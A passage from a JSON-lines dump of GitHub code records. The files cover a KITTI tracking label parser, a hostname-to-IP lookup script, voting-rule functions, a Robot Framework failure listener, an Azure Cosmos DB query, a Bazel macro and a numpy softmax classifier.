better.\n\"\"\"\n\n\ndef get_objects_from_label(label_file):\n with open(label_file, 'r') as f:\n lines = f.readlines()\n objects = [Track3d(line) for line in lines]\n return objects\n\n\ndef cls_type_to_id(cls_type):\n type_to_id = {'Car': 1, 'Pedestrian': 2, 'Cyclist': 3, 'Van': 4}\n if cls_type not in type_to_id.keys():\n return -1\n return type_to_id[cls_type]\n\n\nclass Track3d(object):\n def __init__(self, line):\n label = line.strip().split(' ')\n self.src = line\n self.frame_id = label[0]\n self.track_id = label[1]\n self.cls_type = label[2]\n self.cls_id = cls_type_to_id(self.cls_type)\n\n self.truncation = float(label[3])\n self.occlusion = float(label[4]) # 0:fully visible 1:partly occluded 2:largely occluded 3:unknown\n self.alpha = float(label[5])\n self.box2d = np.array((float(label[6]), float(label[7]), float(label[8]), float(label[9])), dtype=np.float32)\n self.h = float(label[10])\n self.w = float(label[11])\n self.l = float(label[12])\n self.loc = np.array((float(label[13]), float(label[14]), float(label[15])), dtype=np.float32)\n self.dis_to_cam = np.linalg.norm(self.loc)\n self.ry = float(label[16])\n\n def generate_corners3d(self):\n \"\"\"\n generate corners3d representation for this object\n :return corners_3d: (8, 3) corners of box3d in camera coord\n \"\"\"\n l, h, w = self.l, self.h, self.w\n x_corners = [l / 2, l / 2, -l / 2, -l / 2, l / 2, l / 2, -l / 2, -l / 2]\n y_corners = [0, 0, 0, 0, -h, -h, -h, -h]\n z_corners = [w / 2, -w / 2, -w / 2, w / 2, w / 2, -w / 2, -w / 2, w / 2]\n\n R = np.array([[np.cos(self.ry), 0, np.sin(self.ry)],\n [0, 1, 0],\n [-np.sin(self.ry), 0, np.cos(self.ry)]])\n corners3d = np.vstack([x_corners, y_corners, z_corners]) # (3, 8)\n corners3d = np.dot(R, corners3d).T\n corners3d = corners3d + self.loc\n return corners3d\n\n def to_str(self):\n print_str = '%s %.3f %.3f %.3f box2d: %s hwl: [%.3f %.3f %.3f] pos: %s ry: %.3f' \\\n % (self.cls_type, self.truncation, self.occlusion, self.alpha, self.box2d, self.h, self.w, self.l,\n self.loc, self.ry)\n return print_str\n\n def to_kitti_format(self):\n kitti_str = '%s %.2f %d %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f' \\\n % (self.cls_type, self.truncation, int(self.occlusion), self.alpha, self.box2d[0], self.box2d[1],\n self.box2d[2], self.box2d[3], self.h, self.w, self.l, self.loc[0], self.loc[1], self.loc[2],\n self.ry)\n return kitti_str\n","repo_name":"shanjiayao/PTT","sub_path":"ptt/utils/track3d_kitti.py","file_name":"track3d_kitti.py","file_ext":"py","file_size_in_byte":4207,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"48"} +{"seq_id":"13018097453","text":"# Simple IP discloser for URL by Sean Lewis\r\n# Uses Python's socket library\r\n\r\nimport socket\r\nhost = socket.gethostname()\r\nip = socket.gethostbyname(host)\r\nprint(\"Personal Host Name is:\", host)\r\nprint(\"Personal IP Address is:\", ip)\r\nurl = \"github.com\"\r\nwhile url != \"\":\r\n url = input(\"Enter the website address: \")\r\n try:\r\n print(f\"The IP address of {url} is: {socket.gethostbyname(url)}\")\r\n except:\r\n print(\"Please enter a valid URL address\")","repo_name":"seanhlewis/url-ip-discloser","sub_path":"url-ip-discloser.py","file_name":"url-ip-discloser.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41023047167","text":"def readInput(path=\"input.txt\"):\r\n f = open(path, \"r\")\r\n lines = f.readlines()\r\n\r\n piece_type = int(lines[0])\r\n\r\n previous_board = [[int(x) for x in line.rstrip('\\n')]\r\n for line in lines[1:6]]\r\n\r\n board = [[int(x) for x in line.rstrip('\\n')]\r\n for line in lines[6: 12]]\r\n\r\n f.close()\r\n\r\n return piece_type, previous_board, board","repo_name":"Rohit-Putcha/USC-CSCI-561-Artificial-Intelligence","sub_path":"Assignment 2/read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33282800964","text":"class GameConfig:\n def __init__(self, start_game=False, black=False, white=False,\n load_game=False, game_file=None, timer=False, duration=None):\n self.start_game = start_game\n self.black = black\n self.white = white\n self.load_game = load_game\n self.game_file = game_file\n self.timer = timer\n self.duration = duration\n","repo_name":"Apollon76/checkers","sub_path":"src/gameconfig.py","file_name":"gameconfig.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71201524306","text":"import sys\nimport pandas as pd\nfrom utils import Athena_Query\nfrom utils import S3, LabelStore\nimport boto3\nimport datetime\nfrom datetime import datetime, timedelta, date\n\nclass VitalSignExtractor:\n def __init__(self):\n self.athena = Athena_Query()\n \n def get_vitalsign_query(self, patient_ids, parameter_ids):\n patient_ids_string = \"(\" + \",\".join([f\"'{id}'\" for id in patient_ids]) + \")\"\n parameter_ids_string = \"(\" + \",\".join([str(id) for id in parameter_ids]) + \")\"\n\n query = f\"\"\"\n SELECT time, value, parameterid\n FROM metavision_deid_dtm.signals\n WHERE parameterid IN {parameter_ids_string} AND patientid IN {patient_ids_string}\n \"\"\"\n\n return query\n\n def extract_vital_signs(self, patient_ids, parameter_ids, admission_date):\n query = self.get_vitalsign_query(patient_ids, parameter_ids)\n df = self.athena.query_as_pandas(query).drop_duplicates().reset_index(drop=True)\n df.sort_values('time', inplace=True)\n df['time_since_admission'] = (pd.to_datetime(df['time']) - datetime.strptime(admission_date, \"%Y-%m-%d %H:%M:%S.%f\")).dt.total_seconds() / 3600.0\n return df\n\n def all_vital_extract(self, patient_ids, parameter_ids, admission_date):\n column_mapping = {\n 3885: 'HR',\n 3888: 'Diastolic BP',\n 3887: 'Systolic BP',\n 5436: 'ABP Mean',\n 3951: 'SpO2',\n 4083: 'Respiratory rate',\n 3976: 'Temperature',\n 3910: 'Intra-Cranial Pressure'\n }\n\n\n for patient_id in patient_ids:\n query = self.get_vitalsign_query([patient_id], parameter_ids)\n df_query = self.athena.query_as_pandas(query).drop_duplicates().reset_index(drop=True)\n \n df_patient = pd.DataFrame(columns=['time'])\n\n for parameter_id in parameter_ids:\n df_parameter = df_query[df_query['parameterid'] == parameter_id]\n column_name = column_mapping.get(parameter_id, f'value_{parameter_id}')\n df_patient = pd.merge(df_patient, df_parameter[['time', 'value']], how='outer', on='time')\n df_patient.rename(columns={'value': column_name}, inplace=True)\n\n df_patient.sort_values('time', inplace=True)\n df_patient['time_since_start'] = df_patient['time'] - df_patient['time'].iloc[0]\n\n # Convert the time difference to hours\n df_patient['time_since_start'] = df_patient['time_since_start'].dt.total_seconds() / 3600.0\n\n\n return df_patient\n\n \n \n def all_ABG_extract(self, patient_ids, parameter_ids, admission_date):\n column_mapping = {\n 8919: 'PaCo2',\n 11424: 'Potassium',\n 15166: 'Total Hb',\n 13053: 'Oxy Haemoglobin',\n 13054: 'Oxygen Saturation',\n 12347: 'Methaemoglobin',\n 8465: 'Carboxyhaemoglobin',\n 13670: 'PaO2',\n 8523: 'pH',\n 15825: 'Chloride',\n 12756: 'Sodium',\n 15824: 'Glucose',\n 7960: 'Calcium (Ionised)',\n 8527: 'pO2',\n 13188: 'ABG p50',\n 27391: 'Specimen Type',\n 10654: 'ABG Bicarbonate',\n 11763: 'ABG Lactate',\n 3997: 'Pulmonary Artery Pressure Mean',\n 7676: 'ABG Base Excess',\n 6904: 'ABG Anion Gap'\n }\n\n\n for patient_id in patient_ids:\n query = self.get_vitalsign_query([patient_id], parameter_ids)\n df_patient = pd.DataFrame(columns=['time'])\n df_query = self.athena.query_as_pandas(query).drop_duplicates().reset_index(drop=True)\n\n for parameter_id in parameter_ids:\n df_parameter = df_query[df_query['parameterid'] == parameter_id]\n column_name = column_mapping.get(parameter_id, f'value_{parameter_id}')\n df_patient = pd.merge(df_patient, df_parameter[['time', 'value']], how='outer', on='time')\n df_patient.rename(columns={'value': column_name}, inplace=True)\n\n df_patient.sort_values('time', inplace=True)\n\n # Calculate 'time since admission' for each 'time' value\n #admission_date = df_trauma.loc[df_trauma['patientid'] == patient_id, 'admissiondate'].iloc[0]\n df_patient['time_since_admission'] = (pd.to_datetime(df_patient['time']) - datetime.strptime(admission_date, \"%Y-%m-%d %H:%M:%S.%f\")).dt.total_seconds() / 3600.\n\n\n return df_patient\n \n \n def extract_12hr_vital(self, patient_ids, parameter_ids, admission_date):\n target_lower=1\n target_upper=13\n df1 = self.all_vital_extract(patient_ids, parameter_ids, admission_date)\n\n data_within_range = df1.loc[(df1['time_since_admission'] >= target_lower) & (df1['time_since_admission'] <= target_upper)]\n\n if not data_within_range.empty:\n df_result = data_within_range\n else:\n closest_to_lower = df1.loc[df1['time_since_admission'] >= target_lower, 'time_since_admission'].idxmin()\n closest_to_upper = df1.loc[df1['time_since_admission'] <= target_upper, 'time_since_admission'].idxmax()\n\n if abs(df1.loc[closest_to_lower, 'time_since_admission'] - target_lower) <= abs(df1.loc[closest_to_upper, 'time_since_admission'] - target_upper):\n start = closest_to_lower\n else:\n start = closest_to_upper\n\n time_range = pd.Timedelta(hours=12)\n end = start + time_range\n\n if end >= len(df1):\n df_result = df1.loc[start:]\n else:\n df_result = df1.loc[start:end]\n\n return df_result\n \n \n def extract_12hr_vital_new(self, patient_ids, parameter_ids, admission_date):\n target_lower = 1\n target_upper = 13\n df1 = self.all_vital_extract(patient_ids, parameter_ids, admission_date)\n\n if not df1.empty: # Check if the DataFrame is not empty\n data_within_range = df1.loc[(df1['time_since_admission'] >= target_lower) & (df1['time_since_admission'] <= target_upper)]\n\n if not data_within_range.empty:\n df_result = data_within_range\n else:\n closest_to_lower = df1.loc[df1['time_since_admission'] >= target_lower, 'time_since_admission'].idxmin()\n closest_to_upper = df1.loc[df1['time_since_admission'] <= target_upper, 'time_since_admission'].idxmax()\n\n if abs(df1.loc[closest_to_lower, 'time_since_admission'] - target_lower) <= abs(df1.loc[closest_to_upper, 'time_since_admission'] - target_upper):\n start = closest_to_lower\n else:\n start = closest_to_upper\n\n time_range = pd.Timedelta(hours=12)\n end = start + time_range\n\n if end >= len(df1):\n df_result = df1.loc[start:]\n else:\n df_result = df1.loc[start:end]\n else:\n df_result = pd.DataFrame(columns=['time', 'time_since_admission']) # Create an empty DataFrame\n\n return df_result\n","repo_name":"HasiUdayangi/Exploring-regulartory-factors-for-TBI-patients","sub_path":"vitalsign_extraction.py","file_name":"vitalsign_extraction.py","file_ext":"py","file_size_in_byte":7180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72337292305","text":"# import the necessary packages\nfrom Face_Recognition_usingPCA.vectors_distance import Searcher\nfrom Face_Recognition_usingPCA.description import extract_features\nfrom mlxtend.image import extract_face_landmarks\nimport cv2\nimport imageio\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# construct the argument parser and parse the arguments\nindexed_path = \"C:/Users/maiho/PycharmProjects/DPT/Face_Recognition_usingPCA/features.csv\"\nquery_path = \"C:/Users/maiho/PycharmProjects/DPT/Face_Recog/s\"\nresults_path = \"C:/Users/maiho/PycharmProjects/DPT/database\"\n\nimage = imageio.imread(query_path)\nimage = cv2.resize(image, (360, 540))\nprint(image.shape)\nlandmarks = extract_face_landmarks(image)\n# print(landmarks.shape)\n\nimg2 = image.copy()\n\nfig = plt.figure(figsize=(15, 5))\nax = fig.add_subplot(1, 3, 1)\nax.imshow(image)\nax = fig.add_subplot(1, 3, 2)\nax.scatter(landmarks[:, 0], -landmarks[:, 1], alpha=0.8)\nax = fig.add_subplot(1, 3, 3)\nfor idx,p in enumerate(landmarks):\n\timg2[p[1] - 3:p[1] + 3, p[0] - 3:p[0] + 3, :] = (255, 255, 255)\n\tcv2.putText(img2, str(idx), (p[0], p[1]), fontFace=cv2.FONT_HERSHEY_SCRIPT_SIMPLEX,\n\t\t\t\tfontScale=0.4,\n\t\t\t\tcolor=(0, 0, 255))\n\nax.imshow(img2)\nplt.show()\nfeatures = extract_features(image)\nnorm = np.linalg.norm(features)\nnormal_array = features/norm\nfrom sklearn.preprocessing import scale\n# features = scale( features, axis=0, with_mean=True, with_std=True, copy=True )\nprint(normal_array)\n\n# perform the search\nsearcher = Searcher(indexed_path)\nresults = searcher.search(normal_array)\n# display the query\n\ncv2.imshow(\"Query\", image)\ncv2.waitKey(0)\n# loop over the results\nfor (score, resultID) in results:\n\t# load the result image and display it\n\tprint(resultID)\n\tprint(\"=======\")\n\tprint(score)\n\tresult = cv2.imread(results_path + \"/\" + resultID)\n\tresult = cv2.resize(result, (500, 500))\n\tcv2.imshow(\"Result\", result)\n\tcv2.waitKey(0)\n","repo_name":"thangnvkcn/MultimediaDatabaseAssignment","sub_path":"Face_Recognition_usingPCA/face_recognition.py","file_name":"face_recognition.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71904651985","text":"from collections import Counter\n\ndef plurality(data, names, eliminations=[], standalone = False):\n \"\"\"\n Plurality voting\n input:\n data: list of lists of ints (voters' votes)\n names: dict of ints to strings (candidate names)\n eliminations: list of ints (candidates that have been eliminated)\n output:\n winners: list of ints (candidate(s) with most votes)\n losers: list of ints (candidate(s) with least votes)\n \"\"\"\n nr_votes = [0] * len(names)\n\n for ballot in data: # For each ballot\n for candidate in ballot: # For first eligible candidate in the vote\n if type(candidate) == list: # In case of Split vote\n result = tied_vote(candidate, eliminations)\n if result is None: # Both candidates were eliminated,\n continue # continue to next candidate in ballot\n for c in result:\n nr_votes[c] += 1/len(result) # Add weighted vote to one or both candidates\n break\n continue # Both candidates were eliminated, continue to next candidate\n if candidate not in eliminations:\n nr_votes[candidate] += 1 # Add vote to single candidate\n break\n\n # Find the winners and losers\n max_votes = max([i for i in nr_votes if nr_votes.index(i) not in eliminations]) # max(nr_votes) belongs to winner\n winners = [i for i in range(len(nr_votes)) if nr_votes[i] == max_votes] # Find index of winners\n \n # Find the losers\n min_votes = float(\"inf\") # Set min to infinity\n for idx, ballot in enumerate(nr_votes):\n if ballot < min_votes and idx not in eliminations and idx not in winners: # Lower than min, not eliminated and not a winner\n min_votes = ballot # Set new min\n\n # Eliminated if received min votes and not a winner\n losers = [i for i in range(len(nr_votes)) if nr_votes[i] == min_votes \n and i not in winners]\n\n if standalone:\n losers.extend(winners)\n return losers[::-1]\n \n return winners, losers\n\ndef STV(data, names, eliminations=[]):\n\n \"\"\"\n Single Transferable Vote\n input:\n data: list of lists of ints (voters' votes)\n names: dict of ints to strings (candidate names)\n eliminations: list of ints (candidates to be eliminated)\n \"\"\"\n winners, losers = plurality(data, names, eliminations)\n eliminations += losers # Add the eliminated candidates to the list of eliminations\n if len(losers) == 0: \n eliminations.extend(winners)\n return eliminations[::-1] # No more candidates to eliminate, final round\n return STV(data, names, eliminations) \n\ndef approval(data,names):\n \n nr_votes = [0] * len(names) # everyone starts with zero votes\n\n for ballot in data:\n for vote in ballot:\n nr_votes[vote] += 1 # everytime someone approved, they gain a vote\n\n return([x[1] for x in sorted(((value, index) for index, value in enumerate(nr_votes)), reverse=True)]) # return winner\n\ndef condorcet(data,names):\n\n candidate_wins = [[0 for i in range(len(names))] for j in range(len(names))] # start with empty matrix\n\n for i in names:\n for j in names[names.index(i)+1:]: # pairwise comparison of candidates\n if j == i:\n continue\n wins_i = 0\n wins_j = 0\n for ballot in data: # count wins against each other\n if i in ballot and j in ballot:\n if ballot.index(i) < ballot.index(j):\n wins_i += 1\n else:\n wins_j += 1\n elif i in ballot:\n wins_i += 1\n elif j in ballot:\n wins_j += 1 \n if wins_i > wins_j: # mark winner in matrix\n candidate_wins[i][j] = 1\n elif wins_i < wins_j:\n candidate_wins[j][i] = 1\n \n results = []\n i = 1\n while len(results) == 0 and i <= len(names)/2: \n for row in candidate_wins:\n if sum(row) == len(names) - i:\n results.append(candidate_wins.index(row)) \n i += 1\n\n return results \n\ndef borda(data, names):\n\n points = [0] * len(names) # empty list of points\n\n for ballot in data:\n for idx, vote in enumerate(ballot):\n points[vote] += len(names) - 1 - idx # give options n-1,n-2... points based on ranking\n\n return([x[1] for x in sorted(((value, index) for index, value in enumerate(points)), reverse=True)])\n\ndef copeland(data,names):\n\n score = [0] * len(names) # start with empty list\n\n for ballot in data: \n for idx, vote in enumerate(ballot): \n score[vote] += len(names) - 1 - 2*idx # increase score by how many they're above vs how many are ranked higher\n for i in names:\n if i not in ballot:\n score[i] -= len(ballot) # un voted for is tied bottom, subtract number above from score\n\n return([x[1] for x in sorted(((value, index) for index, value in enumerate(score)), reverse=True)])\n\ndef equalshares(projects):\n\n scores = []\n winners = []\n for idx in range(len(projects)):\n scores.append(projects[idx].cost/len(projects[idx].supporters))\n choice = scores.index(min(scores))\n while scores[choice] < 100000:\n if projects[choice].is_affordable():\n projects[choice].pick_in_equal_shares()\n winners.append(choice)\n scores[choice] = 100000\n choice = scores.index(min(scores))\n \n return winners","repo_name":"gracehon-backup/CompSocChoice","sub_path":"final/finalSCFs.py","file_name":"finalSCFs.py","file_ext":"py","file_size_in_byte":6159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19941256304","text":"\"\"\"Robot framework library with listener.\"\"\"\n\nimport logging\nfrom datetime import datetime\nfrom pathlib import Path\nfrom robot.libraries.BuiltIn import BuiltIn\nfrom failurebase_sdk.client import FailurebaseClient\nfrom failurebase_sdk.utils import FailureSchema, TestSchema\n\n\nclass watcher:\n \"\"\"Robot Framework fail listener.\"\"\"\n\n ROBOT_LISTENER_API_VERSION = 2\n ROBOT_LIBRARY_SCOPE = \"GLOBAL\"\n\n def __init__(self):\n\n self.ROBOT_LIBRARY_LISTENER = self\n\n self.last_log = None\n self.client = None\n\n def initialize_failurebase(self, url: str, no_proxy: str, log_name: Path | str | None = None,\n log_level: int = logging.WARNING, encoding: str | None = None) -> None:\n \"\"\"Keyword to initialize \"\"\"\n\n if log_name is None:\n output_dir = BuiltIn().get_variable_value(\"${OUTPUT DIR}\")\n log_name = Path(output_dir) / 'failurebase.log'\n\n self.client = FailurebaseClient(url, no_proxy, log_name, log_level, encoding)\n\n def log_message(self, message: str) -> None:\n self.last_log = message\n\n def end_test(self, _, attrs) -> None:\n\n if attrs['status'] == 'FAIL':\n timestamp = self._change_format_of_timestamp(self.last_log.get('timestamp'))\n test = TestSchema(uid=attrs.get('longname'), file=attrs.get('source'), marks=attrs.get('tags'))\n fail = FailureSchema(test=test, message=attrs.get('message'), traceback=self.last_log.get('message'),\n timestamp=timestamp)\n\n self.client.log(fail.dump())\n\n @staticmethod\n def _change_format_of_timestamp(timestamp: str) -> str:\n ts_obj = datetime.strptime(timestamp, '%Y%m%d %H:%M:%S.%f')\n return datetime.strftime(ts_obj, '%Y-%m-%dT%H:%M:%S.%f')\n","repo_name":"marcinooo/failurebase_sdk","sub_path":"src/failurebase_sdk/robot/watcher.py","file_name":"watcher.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73827567504","text":"from django.urls import path\nfrom .views import signup_view,activate,activation_sent_view\n\n\n\nurlpatterns = [\n\n path('signup/',signup_view,name='signup'),\n path('sent/',activation_sent_view,name='activation_sent'),\n path('activate///',activate,name='activate'),\n\n]\n\n#path('register/',SignUp.as_view(),name='register'),\n#Registre-ser","repo_name":"ChernoBen/hackathon","sub_path":"clientes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30908359484","text":"from azure.cosmos import CosmosClient, exceptions\nimport os\nimport streamlit as st\n\n# Configure your Cosmos DB connection\nif os.getenv(\"Azure_Cosmos_EndPoint\"):\n endpoint = os.getenv(\"Azure_Cosmos_EndPoint\")\nelse:\n endpoint = st.secrets[\"Azure_Cosmos_EndPoint\"]\nif os.getenv(\"Azure_Cosmos_Key\"):\n key = os.getenv(\"Azure_Cosmos_Key\")\nelse:\n key = st.secrets[\"Azure_Cosmos_Key\"]\n\ndatabase_name = \"RealEstate\"\ncontainer_name = \"Properties\"\n\n# Initialize the Cosmos client\nclient = CosmosClient(endpoint, key)\n\n# Get a reference to the database\ndatabase = client.get_database_client(database_name)\n\n# Get a reference to the container\ncontainer = database.get_container_client(container_name)\n\n# Define a query\nquery = \"SELECT * FROM c Where [Property Type]= 'Villa/House'\"\n\ntry:\n # Execute the query\n items = container.query_items(query, enable_cross_partition_query=True)\n\n # Process the query results\n for item in items:\n print(item)\n\nexcept exceptions.CosmosHttpResponseError as e:\n print(\"Error:\", e)\n","repo_name":"rbhattad31/RealEstateSalesGpt","sub_path":"Real_estate/Real_estate/CosmosDB.py","file_name":"CosmosDB.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25896617647","text":"load(\"@bazel_skylib//lib:paths.bzl\", \"paths\")\nload(\"@fbcode_macros//build_defs:src_and_dep_helpers.bzl\", \"src_and_dep_helpers\")\nload(\"@fbcode_macros//build_defs:visibility.bzl\", \"get_visibility\")\nload(\"@fbcode_macros//build_defs:js_common.bzl\", \"js_common\")\n\ndef js_npm_module(\n name,\n srcs,\n node_module_name = None,\n deps = (),\n external_deps = (),\n visibility = None):\n \"\"\"\n Creates a javascript rule that points at a third-party library\n\n This rule copies all files in srcs into a directory based on `name`\n or `node_module_name`\n\n Args:\n name: The name of the rule to create. If `node_module_name` is not\n provided, this will be the name of the submodule underneath the\n genrule's output\n srcs: A list of files to copy into the output directory\n node_module_name: The name of the subdirectory to put all source files\n underneath.\n deps: A list of dependencies for this module. These should be\n javascript rules or genrules, as all files will be copied from\n the 'output' of these dependencies.\n external_deps: A list of `external_deps` style tuples. As with `deps`\n these should either be genrules or javascript rules.\n visibility: The visibility of this rule and created rules. Defaults\n to PUBLIC\n \"\"\"\n\n visibility = get_visibility(visibility, name)\n platform = js_common.get_fbcode_platform()\n\n # NPM modules package their listed sources.\n root = paths.join(\"node_modules\", js_common.get_node_module_name(name, node_module_name))\n out_srcs = [\n (src, paths.join(root, src_and_dep_helpers.get_source_name(src)))\n for src in sorted(srcs)\n ]\n\n js_common.generate_modules_tree(\n name,\n srcs = out_srcs,\n deps = js_common.combine_deps(deps, external_deps, platform),\n visibility = visibility,\n )\n","repo_name":"elaa0505/buckit","sub_path":"infra_macros/fbcode_macros/build_defs/js_npm_module.bzl","file_name":"js_npm_module.bzl","file_ext":"bzl","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"24612535533","text":"import numpy as np\nfrom keras.datasets import mnist\nimport matplotlib.pyplot as plt\nimport os\n\n\n\n\ndef ONE_HOT(y,n_classes):\n return np.eye(n_classes)[y]\n\n\n\ndef initial_parameters(L, layers):\n \"\"\"\n initialization parameters.\n Arguments:\n ---------\n L: #input'units + hidden layers'units\n layers: hidden layers's units\n Return:\n ------\n parameters: include weights and bias.\n \"\"\"\n np.random.seed(1)\n parameters = {}\n V = {}\n M = {}\n for l in range(L - 1):\n W = np.random.randn(layers[l], layers[l + 1]) / np.sqrt(layers[l])\n b = np.zeros((1, layers[l + 1]))\n\n V['V_dW' + str(l + 1)] = np.zeros(W.shape)\n V['V_db' + str(l + 1)] = np.zeros(b.shape)\n M['M_dW' + str(l + 1)] = np.zeros(W.shape)\n M['M_db' + str(l + 1)] = np.zeros(b.shape)\n parameters['W' + str(l + 1)] = W\n parameters['b' + str(l + 1)] = b\n\n return parameters, V, M\n\ndef relu(Z):\n \"\"\"\n ReLu activation\n \"\"\"\n return np.maximum(0,Z)\n\ndef softmax(Z):\n \"\"\"\n softmax activation\n \"\"\"\n t = np.exp(Z)\n return t/np.sum(t,axis=1,keepdims=True)\n\ndef forward(X,L,parameters):\n \"\"\"\n forward propagation\n \"\"\"\n A = X\n cache = {'A0':X}\n for l in range(L-1):\n W = parameters['W'+str(l+1)]\n b = parameters['b'+str(l+1)]\n Z = np.add(np.dot(A,W),b)\n cache['Z'+str(l+1)] = Z\n if l != L -2 :\n A = relu(Z)\n else:\n A = softmax(Z)\n cache['A'+str(l+1)] = A\n return A,cache\n\ndef Loss(A,y):\n \"\"\"\n caculate loss value in mini-batchs or score data.\n \"\"\"\n m = y.shape[0]\n loss = - np.sum(np.multiply(y,np.log(A))) / m\n return loss\n\n\ndef backward(A, y, cache, parameters, L):\n \"\"\"\n Backward propagation\n \"\"\"\n m = y.shape[0]\n dparameters = {}\n for l in range(L - 1, 0, -1):\n if l == L - 1:\n dZ = A - y\n dW = np.dot(cache['A' + str(l - 1)].T, dZ) / m\n db = np.sum(dZ, axis=0, keepdims=True) / m\n else:\n dA = np.dot(dZ, parameters['W' + str(l + 1)].T)\n dZ = np.multiply(dA, np.int64(cache['Z' + str(l)] > 0))\n A = cache['A' + str(l - 1)]\n dW = np.dot(A.T, dZ) / m\n db = np.sum(dZ, axis=0, keepdims=True) / m\n dparameters['dW' + str(l)] = dW\n dparameters['db' + str(l)] = db\n\n return dparameters\n\n\ndef Update(L, dparameters, parameters, V, M, beta_1, beta_2, t, lr, epsilon=1e-8):\n \"\"\"\n Updating parameters and using Adam optimizeer.\n \"\"\"\n for l in range(L - 1):\n M['M_dW' + str(l + 1)] = beta_1 * M['M_dW' + str(l + 1)] + (1 - beta_1) * dparameters['dW' + str(l + 1)]\n M['M_db' + str(l + 1)] = beta_1 * M['M_db' + str(l + 1)] + (1 - beta_1) * dparameters['db' + str(l + 1)]\n\n V['V_dW' + str(l + 1)] = beta_2 * V['V_dW' + str(l + 1)] + (1 - beta_2) * np.square(\n dparameters['dW' + str(l + 1)])\n V['V_db' + str(l + 1)] = beta_2 * V['V_db' + str(l + 1)] + (1 - beta_2) * np.square(\n dparameters['db' + str(l + 1)])\n\n M_correct_dW = M['M_dW' + str(l + 1)] / (1 - np.power(beta_1, t))\n M_correct_db = M['M_db' + str(l + 1)] / (1 - np.power(beta_1, t))\n\n V_correect_dW = V['V_dW' + str(l + 1)] / (1 - np.power(beta_2, t))\n V_correect_db = V['V_db' + str(l + 1)] / (1 - np.power(beta_2, t))\n\n parameters['W' + str(l + 1)] -= lr * M_correct_dW / (np.sqrt(V_correect_dW + epsilon))\n parameters['b' + str(l + 1)] -= lr * M_correct_db / (np.sqrt(V_correect_db + epsilon))\n\n return parameters, V, M\n\n\ndef random_mini_batchs(X, y, seed, batc_size=64):\n \"\"\"\n Create mini-batchs.\n \"\"\"\n np.random.seed(seed) # make sure every epochs the data is shuffle.\n\n m = X.shape[0]\n mini_batchs = []\n\n index_ = np.random.permutation(m)\n\n shuffle_X = X[index_, :]\n shuffle_y = y[index_, :]\n\n num_compute_minibatch_size = m // batc_size\n for i in range(num_compute_minibatch_size):\n mini_x = shuffle_X[i * batc_size:(i + 1) * batc_size, :]\n\n mini_y = shuffle_y[i * batc_size:(i + 1) * batc_size, :]\n mini_batch = (mini_x, mini_y)\n mini_batchs.append(mini_batch)\n\n if m % batc_size != 0:\n mini_x = shuffle_X[num_compute_minibatch_size * batc_size:, :]\n mini_y = shuffle_y[num_compute_minibatch_size * batc_size:, :]\n mini_batch = (mini_x, mini_y)\n mini_batchs.append(mini_batch)\n\n return mini_batchs\n\ndef score(data,labels,L,parameters,is_loss=False):\n \"\"\"\n score model and return correct rate or loss value.\n \"\"\"\n m = labels.shape[0]\n A,_ = forward(data,L,parameters)\n predict_y = np.argmax(A,axis=1)\n true_y = np.argmax(labels,axis=1)\n acc = np.equal(true_y,predict_y).sum() / m\n if is_loss:\n loss = Loss(A,labels)\n return acc,loss\n else:\n return acc\n\n\ndef Softmax_Model(layers, data, labels, val_data, val_labels, lr, epochs, beta_1=0.9, beta_2=0.999, batc_size=64,\n save_path=None,lock=None):\n \"\"\"\n Implement softmax model.\n NN model:Linear(25)--->Linear(12)--->Linear(10)\n \"\"\"\n\n if not os.path.exists(save_path):\n os.mkdir(save_path)\n\n SON_PATH = save_path + str(np.round(lr, 4)) + '/'\n if not os.path.exists(SON_PATH):\n os.mkdir(SON_PATH)\n\n\n layers.insert(0, data.shape[1])\n L = len(layers)\n n_classes = len(np.unique(labels))\n y_train_hot = ONE_HOT(labels, n_classes)\n y_val_hot = ONE_HOT(val_labels, n_classes)\n seed = 0\n t = 0\n losses = []\n val_losses = []\n acc_trains = []\n acc_vals = []\n\n parameters, V, M = initial_parameters(L, layers)\n\n\n for epoch in range(epochs):\n seed += 1\n mini_batchs = random_mini_batchs(data, y_train_hot, seed=seed, batc_size=batc_size)\n for mini_x, mini_y in mini_batchs:\n t += 1\n A, cache = forward(mini_x, L, parameters)\n dparameters = backward(A, mini_y, cache, parameters, L)\n parameters, V, M = Update(L, dparameters, parameters, V, M, beta_1, beta_2, t, lr)\n\n acc_train, train_loss = score(data, y_train_hot, L, parameters, True)\n acc_val, val_loss = score(val_data, y_val_hot, L, parameters, True)\n\n losses.append(train_loss)\n val_losses.append(val_loss)\n acc_trains.append(acc_train)\n acc_vals.append(acc_val)\n\n print('[{}/{}] loss:{:.4f},acc_train:{:.4f},val_loss:{:.4f},acc_val:{:.4f}'.format(epoch + 1,\n epochs,\n train_loss,\n acc_train,\n val_loss,\n acc_val))\n\n FULL_PATH_TXT = SON_PATH + 'log.txt'\n with lock:\n with open(FULL_PATH_TXT,mode='a') as f:\n WRITE = '[{}/{}] loss:{:.4f},acc_train:{:.4f},val_loss:{:.4f},acc_val:{:.4f}\\n'.format(epoch + 1,\n 